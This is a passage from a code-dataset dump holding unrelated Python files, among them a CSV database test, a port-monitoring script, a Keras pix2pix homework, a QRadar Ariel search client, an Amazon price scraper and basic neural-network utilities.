IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n##############################################################################\nimport unittest\nimport io\nimport csvdb\n\n\nclass TestCsvDb(unittest.TestCase):\n def test_basic_csv(self):\n conn = csvdb.connect(io.StringIO(\n\"\"\"aaa,bbb,ccc\n1,2,3\na,b,c\nA,B,C\n\"\"\"))\n cur = conn.cursor()\n cur.execute('ccc,aaa')\n self.assertEqual(\n [d[0] for d in cur.description],\n ['ccc', 'aaa']\n )\n self.assertEqual(\n [d[6] for d in cur.description],\n [True, False]\n )\n self.assertEqual(\n cur.fetchall(),\n [('3','1'),('c','a'),('C','A')]\n )\n\n def test_null_blank_csv(self):\n conn = csvdb.connect(io.StringIO(\n\"\"\"aaa,bbb,ccc\n1,2,\na,,c\nA,\n,\n\nx\n\"\"\"))\n cur = conn.cursor()\n cur.execute('aaa,bbb,ccc')\n self.assertEqual(\n cur.fetchall(),\n [('1','2', ''),('a','', 'c'),('A','', None),('','', None),('x', None, None)]\n )\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"csvdb/test_csvdb.py","file_name":"test_csvdb.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"640277094","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@author: yushuibo\n@licence: (c) Copyright 2017-2027, Node Supply China Manager Corporation Limited.\n@contact: hengchen2005@gmail.com\n@sftware: PyCharm\n@site : \n@file : progress_monitor.py\n@time: 2018/2/7 下午 02:31\n@desc: --\n'''\n\nfrom utils.monitor import Monitor\n\n\nclass ProgressMonitor(Monitor):\n\n\tdef watch(self, server):\n\t\tfor index, item in enumerate(server.tcpPorts):\n\t\t\tcmd = ['netstat -lntup|grep ', item, '|wc -l']\n\t\t\tresult = server.run_shell(''.join(cmd))\n\t\t\tif result[0] == b'0\\n':\n\t\t\t\tmsg = 'A project is not working now!\\nDetails:\\n\\tServerName:\\t{0}\\n\\tIP:\\t{1}\\n\\tProject:\\t{2}\\n\\t' \\\n\t\t\t\t\t 'TcpPort:\\t{3}'.format(server.name, server.ip, server.projects[index], item)\n\t\t\t\tself.send_mail('Fire!', ''.join(msg))\n","sub_path":"lazydog/build/lazydog_v0.1/utils/progress_monitor.py","file_name":"progress_monitor.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"504791658","text":"import typing\nfrom dataclasses import dataclass\n\nfrom discord.ext import vbu\n\nfrom . 
import Pp, Skill\n\n\n__all__ = (\"CachedUser\", \"get_user_cache\")\n\n\n@dataclass\nclass CachedUser:\n    \"\"\"\n    Represents a cached user.\n\n    Attributes:\n        user_id (int): The user's ID.\n        skills (`list` of `:class:Skill`): The user's cached skills.\n        pp (`:class:Pp`): The user's cached pp.\n    \"\"\"\n\n    user_id: int\n    skills: typing.List[Skill]\n    pp: Pp\n\n    def __init__(self, user_id: int, skills: typing.List[Skill], pp: Pp):\n        \"\"\"\n        Represents a cached user.\n\n        Args:\n            user_id (int): The user's ID.\n            skills (`list` of `:class:Skill`): The user's cached skills.\n            pp (`:class:Pp`): The user's cached pp.\n        \"\"\"\n\n        self.user_id = user_id\n        self.skills = skills\n        self.pp = pp\n\n    def get_skill(self, name: str) -> Skill:\n        \"\"\"\n        Gets a skill.\n\n        Args:\n            name (`str`): The skill's name.\n\n        Returns:\n            `:class:Skill`: The existing skill, or a new empty skill with `name` as the skill name.\n        \"\"\"\n\n        try:\n            skill = next(x for x in self.skills if x.name == name)\n        except StopIteration:\n            skill = Skill(self.user_id, name=name)\n            self.skills.append(skill)\n        return skill\n\n\nasync def get_user_cache(\n    cog: vbu.Cog, user_id: int, db: typing.Optional[vbu.DatabaseConnection]\n) -> CachedUser:\n    \"\"\"\n    :coro: Returns user's cached information, if any. Otherwise returns data from the database.\n\n    Args:\n        cog (`:class:vbu.Cog`): The cog.\n        user_id (`int`): The user's ID.\n        db (:class:`voxelbotutils.DatabaseConnection`): The database connection.\n\n    Returns:\n        :class:`CachedUser`: The user's cache.\n    \"\"\"\n\n    # If the user is already cached, return it\n    try:\n        return cog.bot.user_cache[user_id]\n\n    # Otherwise, let's create it\n    except KeyError:\n\n        # Get the user's skills\n        user_skill_rows = await db(\n            \"SELECT * FROM user_skill WHERE user_id = $1\", user_id\n        )\n        user_skills = [Skill(**i) for i in user_skill_rows]\n\n        # Now let's get the user's pp\n        try:\n            pp_rows = await db(\"SELECT * FROM user_pp WHERE user_id = $1\", user_id)\n            user_pp = Pp(**pp_rows[0])\n\n        # apparently the user doesn't have pp? Let's create one\n        except IndexError:\n            user_pp = Pp(user_id)\n\n        # Now we add this to the user cache\n        cog.bot.user_cache[user_id] = CachedUser(user_id, user_skills, user_pp)\n\n        # we do a little logging. it's called: \"We do a little logging\"\n        cog.logger.info(f\"Creating user cache for {user_id}... 
success\")\n\n # and return the user cache\n return cog.bot.user_cache[user_id]\n","sub_path":"cogs/utils/cached_user.py","file_name":"cached_user.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"452652173","text":"\n# coding: utf-8\n\n\nfrom __future__ import print_function, division\n\nimport os\nimport sys\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport matplotlib.pyplot as plt\nfrom scipy.misc import *\nfrom glob import glob\n\nfrom keras.datasets import mnist\nfrom keras_contrib.layers.normalization import InstanceNormalization\nfrom keras.layers import Input, Dense, Reshape, Flatten, Dropout, Concatenate\nfrom keras.layers import BatchNormalization, Activation, ZeroPadding2D\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.layers.convolutional import UpSampling2D, Conv2D\nfrom keras.models import Sequential, Model\nfrom keras.optimizers import Adam\n\n\n\nclass Pix2Pix():\n def __init__(self):\n # Input shape\n self.img_rows = 128\n self.img_cols = 128\n self.channels = 1\n self.img_shape = (self.img_rows, self.img_cols, self.channels)\n\n # Configure data loader\n self.dataset_name = 'train'\n \n # Calculate output shape of D (PatchGAN)\n patch = int(self.img_rows / 2**4)\n self.disc_patch = (patch, patch, 1)\n\n # Number of filters in the first layer of G and D\n self.gf = 64\n self.df = 64\n\n optimizer = Adam(0.0002, 0.5)\n\n # Build and compile the discriminator\n self.discriminator = self.build_discriminator()\n self.discriminator.compile(loss='mse', optimizer=optimizer, metrics=['accuracy'])\n\n # Build the generator\n self.generator = self.build_generator()\n \n # Input images and their conditioning images\n img_A = Input(shape=self.img_shape)\n img_B = Input(shape=self.img_shape)\n\n # By conditioning on B generate a fake version of A\n fake_A = self.generator(img_B)\n\n # For the combined model we will only train the generator\n self.discriminator.trainable = False\n\n # Discriminators determines validity of translated images / condition pairs\n valid = self.discriminator([fake_A, img_B])\n\n self.combined = Model(inputs=[img_A, img_B], outputs=[valid, fake_A])\n self.combined.compile(loss=['mse', 'mae'], loss_weights=[1, 100], optimizer=optimizer)\n\n def build_generator(self):\n \"\"\"U-Net Generator\"\"\"\n\n def conv2d(layer_input, filters, f_size=4, bn=True):\n \"\"\"Layers used during downsampling\"\"\"\n d = Conv2D(filters, kernel_size=f_size, strides=2, padding='same')(layer_input)\n d = LeakyReLU(alpha=0.2)(d)\n if bn:\n d = BatchNormalization(momentum=0.8)(d)\n return d\n\n def deconv2d(layer_input, skip_input, filters, f_size=4, dropout_rate=0):\n \"\"\"Layers used during upsampling\"\"\"\n u = UpSampling2D(size=2)(layer_input)\n u = Conv2D(filters, kernel_size=f_size, strides=1, padding='same', activation='relu')(u)\n if dropout_rate:\n u = Dropout(dropout_rate)(u)\n u = BatchNormalization(momentum=0.8)(u)\n u = Concatenate()([u, skip_input])\n return u\n\n # Image input\n d0 = Input(shape=self.img_shape)\n\n # Downsampling\n d1 = conv2d(d0, self.gf, bn=False)\n d2 = conv2d(d1, self.gf*2)\n d3 = conv2d(d2, self.gf*4)\n d4 = conv2d(d3, self.gf*8)\n d5 = conv2d(d4, self.gf*8)\n d6 = conv2d(d5, self.gf*8)\n d7 = conv2d(d6, self.gf*8)\n\n # Upsampling\n u1 = deconv2d(d7, d6, self.gf*8)\n u2 = deconv2d(u1, d5, self.gf*8)\n u3 = deconv2d(u2, d4, self.gf*8)\n u4 = deconv2d(u3, d3, self.gf*4)\n u5 = deconv2d(u4, d2, self.gf*2)\n u6 = 
deconv2d(u5, d1, self.gf)\n\n u7 = UpSampling2D(size=2)(u6)\n output_img = Conv2D(self.channels, kernel_size=4, strides=1, padding='same', activation='sigmoid')(u7)\n\n return Model(d0, output_img)\n\n def build_discriminator(self):\n\n def d_layer(layer_input, filters, f_size=4, bn=True):\n \"\"\"Discriminator layer\"\"\"\n d = Conv2D(filters, kernel_size=f_size, strides=2, padding='same')(layer_input)\n d = LeakyReLU(alpha=0.2)(d)\n if bn:\n d = BatchNormalization(momentum=0.8)(d)\n return d\n\n img_A = Input(shape=self.img_shape)\n img_B = Input(shape=self.img_shape)\n\n # Concatenate image and conditioning image by channels to produce input\n combined_imgs = Concatenate(axis=-1)([img_A, img_B])\n\n d1 = d_layer(combined_imgs, self.df, bn=False)\n d2 = d_layer(d1, self.df*2)\n d3 = d_layer(d2, self.df*4)\n d4 = d_layer(d3, self.df*8)\n\n validity = Conv2D(1, kernel_size=4, strides=1, padding='same')(d4)\n\n return Model([img_A, img_B], validity)\n\nif __name__ == '__main__':\n gan = Pix2Pix()\n print(\"generator: \")\n# gan.generator.summary()\n print(\"discriminator: \")\n# gan.discriminator.summary()\n# gan.combined.summary()\n\n\ndef generator_training_Img(real_list_dir,white_list_dir,resize=None,batch_size=32):\n batch_real_img=[]\n batch_white_img=[]\n for _ in range(batch_size):\n random_img_index = np.random.randint(0, 254, size=1)[0]\n real_img = imread(real_list_dir[random_img_index] , mode='L')\n white_img = imread(white_list_dir[random_img_index] , mode='L')\n\n if resize:\n real_img = imresize(real_img,resize)\n white_img = imresize(white_img,resize)\n batch_real_img.append(real_img)\n batch_white_img.append(white_img)\n batch_real_img = np.array(batch_real_img)/127.5-1\n batch_real_img = np.expand_dims(batch_real_img,axis=1)\n batch_white_img = np.array(batch_white_img)/127.5-1\n batch_white_img = np.expand_dims(batch_white_img,axis=3)\n return batch_real_img,batch_white_img\n\ndef generator_test_Img(white_list_dir,resize=None ):\n batch_real_img=[]\n batch_white_img=[]\n for i in range(10):\n white_img = imread(white_list_dir[i] , mode='L')\n\n if resize:\n white_img = imresize(white_img,resize)\n batch_white_img.append(white_img)\n batch_white_img = np.array(batch_white_img)/127.5-1\n batch_white_img = np.expand_dims(batch_white_img,axis=3)\n return batch_white_img\n\n\ntrain_real_data_dir = r'./datasets/train/Real/*'\ntrain_white_data_dir = r'./datasets/train/White/*'\n\nreal_list = glob(train_real_data_dir)\ntrain_real_data_list = []\ntrain_real_data_list.extend(real_list)\n\nwhite_list = glob(train_white_data_dir)\ntrain_white_data_list = []\ntrain_white_data_list.extend(white_list)\n\n\nepochs = 7000\nbatch_size_val = 32\nall_d_loss = np.zeros(epochs)\nall_g_loss = np.zeros(epochs)\n \n# Adversarial loss ground truths\nvalid = np.ones((batch_size_val, 8, 8,1))\nfake = np.zeros((batch_size_val, 8, 8, 1))\n\nfor epoch in range(0, epochs):\n start_time = datetime.datetime.now()\n \n ori_img,white_img = generator_training_Img(real_list_dir=train_real_data_list,\n white_list_dir=train_white_data_list,\n resize=(128,128),\n batch_size= batch_size_val)\n imgs_A = ori_img \n imgs_B = white_img \n imgs_B = imgs_B.reshape((32,128,128,1))\n imgs_A = imgs_A.reshape((32,128,128,1))\n \n\n fake_A = gan.generator.predict(imgs_B)\n d_loss_real = gan.discriminator.train_on_batch([imgs_A, imgs_B], valid)\n d_loss_fake = gan.discriminator.train_on_batch([fake_A, imgs_B], fake)\n d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)\n \n for i in range(4):\n g_loss = 
gan.combined.train_on_batch([imgs_A, imgs_B], [valid, imgs_A])\n \n all_d_loss[epoch] = d_loss[0]\n all_g_loss[epoch] = g_loss[0]\n \n elapsed_time = str(datetime.datetime.now() - start_time)\n print_out = (epoch, epochs, d_loss[0], 100*d_loss[1], g_loss[0],elapsed_time.split(\".\")[0])\n print (\"[Epoch %d/%d] [D loss: %f, acc: %3d%%] [G loss: %f] time: %s\" % print_out)\n np.savetxt(\"all_d_loss.txt\", all_d_loss, delimiter=\",\")\n np.savetxt(\"all_g_loss.txt\", all_g_loss, delimiter=\",\")\n\n\ntest_white_data_dir = r'./datasets/test/*'\ntest_white_list = glob(test_white_data_dir)\ntest_white_data_list = []\ntest_white_data_list.extend(test_white_list)\ntest_white_data_list = sorted(test_white_data_list)\n\nprint(len(test_white_data_list), test_white_data_list)\ntest_white_data_list = generator_test_Img( white_list_dir=test_white_data_list, resize=(128,128))\n\nfake_A = gan.generator.predict(test_white_data_list)\ngen_imgs = np.concatenate([fake_A])\ngen_imgs = 0.5 * gen_imgs\nprint(gen_imgs.shape)\n\n\nids = 0\nfor img in gen_imgs:\n img = img.reshape((128, 128))\n plt.imsave(\"res_images/main_test_res_\" + str(ids) + \".jpg\", img, cmap=\"gray\")\n ids += 1 \nplt.close() \nprint(\"test_data generator predict over.\")\n\n\ndef numpy_to_csv(input_image,image_number=10,save_csv_name='predict.csv'):\n save_image=np.zeros([int(input_image.size/image_number),image_number],dtype=np.float32)\n\n for image_index in range(image_number):\n save_image[:,image_index]=input_image[image_index,:,:].flatten()\n\n base_word='id'\n df = pd.DataFrame(save_image)\n index_col=[]\n for i in range(n):\n col_word=base_word+str(i)\n index_col.append(col_word)\n df.index.name='index'\n df.columns=index_col\n df.to_csv(save_csv_name)\n print(\"Okay! numpy_to_csv\")\n\nn=10\nnumpy_to_csv(input_image= gen_imgs,image_number=n,save_csv_name='Predict.csv')\n\n\n# draw loss \nall_d_loss_txt = np.loadtxt(\"all_d_loss.txt\")\nall_g_loss_txt = np.loadtxt(\"all_g_loss.txt\")\n\n# print( all_d_loss_txt.shape, all_d_loss_txt.shape[0])\n# print(all_g_loss_txt, all_g_loss_txt.shape, all_g_loss_txt.shape[0])\n\nfig = plt.figure()\nax = plt.axes()\nall_d_loss_x = np.linspace(0, 1, all_d_loss_txt.shape[0])\nall_g_loss_x = np.linspace(0, 1, all_g_loss_txt.shape[0])\n\nplt.plot(all_g_loss_x, all_g_loss_txt, '-r'); # dotted red, g_loss\nplt.plot(all_d_loss_x , all_d_loss_txt , '-g'); # dotted green, d_loss\n\nplt.show()\n\n","sub_path":"homework5/commit/A10515001.py","file_name":"A10515001.py","file_ext":"py","file_size_in_byte":10098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"246545216","text":"#!/usr/bin/python\n# Licensed Materials - Property of IBM\n# 5725I76-CC011829\n# (C) Copyright IBM Corp. 2012, 2020. All Rights Reserved.\n# US Government Users Restricted Rights - Use, duplication or\n# disclosure restricted by GSA ADP Schedule Contract with IBM Corp.\n\nimport time\nimport logging\nfrom flask import request\nfrom . 
import qpylib\n\nclass ArielSearchError(Exception):\n \"\"\"Exception raised for errors in Ariel search.\n\n Attributes:\n expression -- input expression in which the error occurred\n message -- explanation of the error\n \"\"\"\n def __init__(self, expression, message):\n super(ArielSearchError, self).__init__(message)\n self.expression = expression\n self.message = message\n def __str__(self):\n return self.message\nclass ArielSearches():\n \"\"\" Provides methods for executing Ariel searches from the QRadar ariel API.\"\"\"\n\n def __init__(self, auth_token=None):\n \"\"\"Constructor.\"\"\"\n self.logger = logging.getLogger('com.ibm.applicationLogger')\n self.auth_token = auth_token\n\n @staticmethod\n def __acquire_sec_token():\n \"\"\"\n Acquire security token\n \"\"\"\n if request:\n return request.cookies.get('SEC')\n return None\n\n @staticmethod\n def __acquire_qradarcsrf_token():\n \"\"\"\n Acquire QRadar CSRF token\n \"\"\"\n if request:\n return request.cookies.get('QRadarCSRF')\n return None\n\n def get_tokens(self, headers):\n \"\"\"\n Retrieve tokens\n \"\"\"\n if headers is None:\n headers = {}\n if 'SEC' not in headers:\n if self.auth_token:\n headers['SEC'] = self.auth_token\n elif request:\n headers['SEC'] = self.__acquire_sec_token()\n else:\n raise ArielSearchError(None, \"Unable to aquire any SEC token\")\n if request and 'QRadarCSRF' not in headers:\n headers['QRadarCSRF'] = self.__acquire_qradarcsrf_token()\n return headers\n\n def search(self, query):\n \"\"\" Creates an Ariel search as specified by the AQL query expression.\n Searches are performed asynchronously.\n @param query: The AQL query to execute.\n @return: Tuple containing the search status and search_id.\n \"\"\"\n headers = self.get_tokens({'Accept':'application/json', 'Content-Type':'application/json',\n 'Version':'5.1'})\n params = {'query_expression':query, 'fields':'status,search_id'}\n full_url = 'api/ariel/searches'\n if self.logger.isEnabledFor(logging.DEBUG):\n self.logger.debug(\"REQUEST: {%s}, headers={%s}, params={%s}\",\n full_url, headers, params)\n response = qpylib.REST('post', full_url, headers=headers, params=params)\n if self.logger.isEnabledFor(logging.DEBUG):\n self.logger.debug(\"RESPONSE (status_code={%d}): {%s}\",\n response.status_code, response.text)\n if response.status_code != 201:\n self.logger.error(\" Failed to start Ariel search with query expression {%s}: {%s} {%d}\",\n query, response.text, response.status_code)\n try:\n response_json = response.json()\n message = response_json[\"message\"] if \"message\" in response_json else response.text\n except ValueError:\n message = response.text\n raise ArielSearchError(query, message)\n return (response.json().get('status'), response.json().get('search_id'))\n\n def search_s(self, query, timeout=60):\n \"\"\" Creates an Ariel search as specified by the AQL query expression.\n Searches are performed synchronously.\n @param query: The AQL query to execute.\n @param timeout: The timeout to wait for the search to complete\n @return: The record count of the search results.\n \"\"\"\n response = self.search(query)\n wait_timeout = time.time() + timeout\n search_id = response[1]\n while True:\n status, record_count = self.status(search_id)\n if status in ('CANCELED', 'ERROR'):\n raise ArielSearchError(query,\n \"Ariel search_id {0} failed; {1}\"\n .format(search_id, status))\n if status == 'COMPLETED':\n return (search_id, record_count)\n\n if time.time() < wait_timeout:\n time.sleep(10)\n continue\n raise ArielSearchError(query,\n 
\"Ariel search_id {0} did not complete within {1}s!\"\n .format(search_id, timeout))\n\n def status(self, search_id):\n \"\"\"Retrieve status information for a search, based on the search_id parameter.\n @param search_id: The identifier for an Ariel search.\n @return: Tuple containing the search status and record count.\n \"\"\"\n headers = self.get_tokens({'Accept':'application/json', 'Content-Type':'application/json',\n 'Version':'5.1'})\n params = {'fields': 'status,record_count'}\n full_url = 'api/ariel/searches/' + search_id\n if self.logger.isEnabledFor(logging.DEBUG):\n self.logger.debug(\"REQUEST: {%s}, headers={%s},params={%s}\",\n full_url, headers, params)\n response = qpylib.REST('get', full_url, headers=headers, params=params)\n response_json = response.json()\n if self.logger.isEnabledFor(logging.DEBUG):\n self.logger.debug(\"RESPONSE: {%s}\", response_json)\n if response.status_code != 200:\n raise ArielSearchError(None, \"Ariel search_id {0} failed;{1}\"\n .format(search_id, response.content))\n return (response_json['status'], response_json['record_count'])\n\n def results(self, search_id, start=0, end=0):\n \"\"\" Retrieve the results of the Ariel search that is identified by the search_id.\n @param search_id: The identifier for an Ariel search.\n @param start: the start offset of the range of records to return\n @param end: the end offset of the range of records to return\n \"\"\"\n headers = self.get_tokens({'Accept':'application/json', 'Content-Type':'application/json',\n 'Version':'5.1'})\n if (start < 0) or (end < start):\n raise ValueError(\"Invalid range; the results are indexed starting at zero\")\n if end > 0:\n headers['Range'] = 'items={0}-{1}'.format(start, end)\n full_url = 'api/ariel/searches/{0}/results'.format(search_id)\n if self.logger.isEnabledFor(logging.DEBUG):\n self.logger.debug(\"REQUEST: {%s}, headers={%s}, params=\",\n full_url, headers)\n response = qpylib.REST('get', full_url, headers=headers)\n if response.status_code != 200:\n raise ArielSearchError(None, \"Ariel search {0} failed; {1}\"\n .format(search_id, response.content))\n return response.json()\n","sub_path":"qpylib/ariel.py","file_name":"ariel.py","file_ext":"py","file_size_in_byte":7236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"57283024","text":"\n\n#calss header\nclass _PARISIAN():\n\tdef __init__(self,): \n\t\tself.name = \"PARISIAN\"\n\t\tself.definitions = [u'from, belonging to, or relating to the city of Paris in France: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_parisian.py","file_name":"_parisian.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"635858506","text":"import torch\nimport os\nimport torch.nn as nn\n\ndef test(model, test_loader):\n\ttotal, correct = 0, 0\n\tmodel.eval()\n\twith torch.no_grad():\n\t\tfor batch_idx, (inputs, targets) in enumerate(test_loader):\n\t\t\t# print(batch_idx)\n\t\t\tinputs, targets = inputs.cuda(), targets.cuda()\n\t\t\toutputs = model(inputs)\n\t\t\t_, predicted = outputs.max(1)\n\t\t\ttotal += targets.size(0)\n\t\t\tcorrect += predicted.eq(targets).sum().item()\n\t\t\tacc = 
correct/total\n\t\t\t# if batch_idx % 10 == 0:\n\t\t\t# print('Acc: %.2f%% (%d/%d)'% (100. * acc, correct, total))\n\tprint('Final acc: %.2f%% (%d/%d)'% (100. * acc, correct, total))\n\tmodel.train()\n\treturn acc\n\n\ndef train(model, train_loader, test_loader, epoch, work_dir=None, lr=None):\n\tif work_dir is not None:\n\t\tif not os.path.exists(work_dir):\n\t\t\tos.makedirs(work_dir)\n\telse:\n\t\twork_dir = ''\n\tprint('Training...')\n\tacc = test(model, test_loader)\n\tprint('Accuracy for model before fine-tuning = {}'.format(acc))\n\t\n\tcrit = nn.CrossEntropyLoss().cuda()\n\toptimizer = torch.optim.SGD(model.parameters(), lr=lr, momentum=0.9)\n\tbest_acc = 0\n\tfor i in range(epoch):\n\t\ttotal_loss = 0\n\t\tfor batch_idx, (inputs, targets) in enumerate(train_loader):\n\t\t\toptimizer.zero_grad()\n\t\t\tinputs, targets = inputs.cuda(), targets.cuda()\n\t\t\toutputs = model(inputs)\n\t\t\tloss = crit(outputs, targets)\n\t\t\ttotal_loss += loss.item()\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\t\t\tif batch_idx % 50 == 9:\n\t\t\t\tprint('Epoch = {}, iteration = {}, loss = {}'.format(i + 1, batch_idx + 1, total_loss))\n\t\t\t\ttotal_loss = 0\n\t\tacc = test(model, test_loader)\n\t\tif acc > best_acc:\n\t\t\ttorch.save(model.state_dict(), work_dir + '/best_model.pth')\n\t\t\tbest_acc = acc\n\t\tprint('Accuracy after fine-tuning epoch {} = {}, best accuracy = {}'.format(i + 1, acc, best_acc))\n\t\ttorch.save(model.state_dict(), work_dir + '/epoch{}.pth'.format(i))\n","sub_path":"portable_quantizer_codes/train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"30239065","text":"# -*-coding:utf-8-*-\n\"\"\"Article class file for the media understanding 2017 project.\n\nFile name: article.py\nAuthor: Media Understanding 2017\nDate created: 7/2/2017\nDate last modified: 7/2/2017\nPython Version: 3.4\n\"\"\"\nfrom collections import Counter\n\nclass Article(object):\n    \"\"\"\n    Standardized format for a news entry from any source.\n\n    All news entries should be in this format, unspecified arguments are\n    initialized as empty strings, except for keywords, which is a list.\n    It is initialized like this: article.Article(args)\n    \"\"\"\n\n    def __init__(self, title=\"\", author=\"\", source=\"\", url=\"\", category=\"\",\n                 keywords=[], published=\"\", summary=\"\", text=\"\", ID=\"\", term_count=Counter()):\n        \"\"\"Initialize all values.\"\"\"\n        self.title = title\n        self.author = author\n        self.source = source\n        self.url = url\n        self.keywords = keywords\n        self.category = category\n        self.published = published\n        self.summary = summary\n        self.text = text\n        self.ID = ID\n        self.term_count = term_count\n\n    def __repr__(self):\n        \"\"\"Print article name when object is printed.\"\"\"\n        return self.title
\"\n","sub_path":"media_conversation/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"288012325","text":"# given array of elements find duplicate elements\n#BRUTE\nnums = [1,2,9,3,66,9]\n\ndef find_duplicates(nums):\n for i in range(len(nums)-1):\n for j in range(i+1, len(nums)):\n if nums[i] == nums[j]:\n return True\n return False\n#print(find_duplicates(nums))\n\n#sol2 : Sort array find adjacent ele are same\n#optimun - o(nlogn)\ndef find_duplicates_sort(nums):\n nums = sorted(nums)\n for i in range(len(nums)-1):\n if nums[i] == nums[i+1]:\n return True\n return False\n#print(find_duplicates_opt(nums))\n\n#sol3 - Hashset - o(n)\ndef find_duplicates_hash(nums):\n hset=set()\n for i in nums:\n if i not in hset:\n hset.add(i)\n else:\n return True\n return False\nprint(find_duplicates_hash(nums))\n \n\n","sub_path":"Contains-Duplicate.py","file_name":"Contains-Duplicate.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"144906746","text":"import time\r\nimport PIL\r\nfrom PIL import Image\r\nimport Adafruit_SSD1306\r\nimport numpy as np\r\n\r\ndisp = Adafruit_SSD1306.SSD1306_128_32(rst=None, i2c_bus=1, gpio=1)\r\n\r\ndisp.begin()\r\n\r\ndisp.clear()\r\ndisp.display()\r\n\r\nimIN = Image.open(\"GIFlove.gif\")\r\n\r\n\r\nf = 0.4\r\nfy = int(imIN.size[0] * f)\r\nfx = int(imIN.size[1] * f)\r\n\r\ny = 36\r\nx = 21\r\n\r\nwhile True:\r\n for i in range(imIN.n_frames):\r\n imIN.seek(i)\r\n ip = np.asarray(imIN.resize((fy,fx)))[y:y+32,x:x+128]\r\n ipinv = np.zeros(ip.shape)\r\n for iy in range(ip.shape[0]):\r\n for ix in range(ip.shape[1]):\r\n if ip[iy,ix] > 30:\r\n ipinv[iy,ix] = 0\r\n else:\r\n ipinv[iy,ix] = 1\r\n\r\n disp.image(Image.fromarray(ipinv).convert(\"1\"))\r\n disp.display()\r\n time.sleep(1)\r\n","sub_path":"GIFlove.py","file_name":"GIFlove.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"275572572","text":"def amazon(amazon_website):\n from selenium import webdriver\n from selenium.webdriver.firefox.options import Options\n options = Options()\n options.headless = True\n driver = webdriver.Firefox(options=options)\n actual_amazon_website = driver.get(amazon_website)\n amazon_price = driver.find_element_by_xpath('//*[@id=\"price_inside_buybox\"]')\n print(amazon_price.text)\n driver.close()\n","sub_path":"websites/amazon/backup_for_amazon.py","file_name":"backup_for_amazon.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"574151630","text":"#!/usr/bin/env python3\nimport numpy as np\n\ndef step_func(x):\n return np.array(x > 0, dtype=np.int)\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\ndef relu(x):\n return np.maximum(0, x)\n\ndef identity_function(x):\n return x\n\ndef softmax(a):\n c = np.max(a)\n exp_a = np.exp(a - c)\n sum_exp_a = np.sum(exp_a)\n y = exp_a / sum_exp_a\n return y\n\ndef mean_squared_error(y, t):\n return 0.5 * np.sum((y - t) ** 2)\n\ndef cross_entropy_error(y, t):\n delta = 1e-7\n return -1 * np.sum(t * np.log(y + delta))\n\ndef numerical_gradient(f, x):\n h = 1e-4\n grad = np.zeros_like(x)\n\n for i in range(x.size):\n tmp_val = x[i]\n x[i] = tmp_val + h\n fxh1 = f(x)\n\n x[i] = tmp_val - h\n fxh2 = f(x)\n\n grad[i] = (fxh1 - fxh2) 
/ (2 * h)\n x[i] = tmp_val\n return grad\n \n \ndef gradient_descent(f, init_x, lr=0.01, step_num=100):\n x = init_x\n\n for i in range(step_num):\n grad = numerical_gradient(f, x)\n x -= lr * grad\n\n return x\n\ndef init_network():\n network = {}\n network['W1'] = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])\n network['b1'] = np.array([0.1, 0.2, 0.3])\n network['W2'] = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])\n network['b2'] = np.array([0.1, 0.2])\n network['W3'] = np.array([[0.1, 0.3], [0.2, 0.4]])\n network['b3'] = np.array([0.1, 0.2])\n return network\n\ndef forward(network, x):\n W1, W2, W3 = network['W1'], network['W2'], network['W3']\n b1, b2, b3 = network['b1'], network['b2'], network['b3']\n\n a1 = np.dot(x, W1) + b1\n z1 = sigmoid(a1)\n\n a2 = np.dot(z1, W2) + b2\n z2 = sigmoid(a2)\n\n a3 = np.dot(z2, W3) + b3\n y = identity_function(a3)\n\n return y\n \nif __name__ == '__main__':\n network = init_network()\n X = np.array([1.0, 0.5])\n Y = forward(network, X)\n 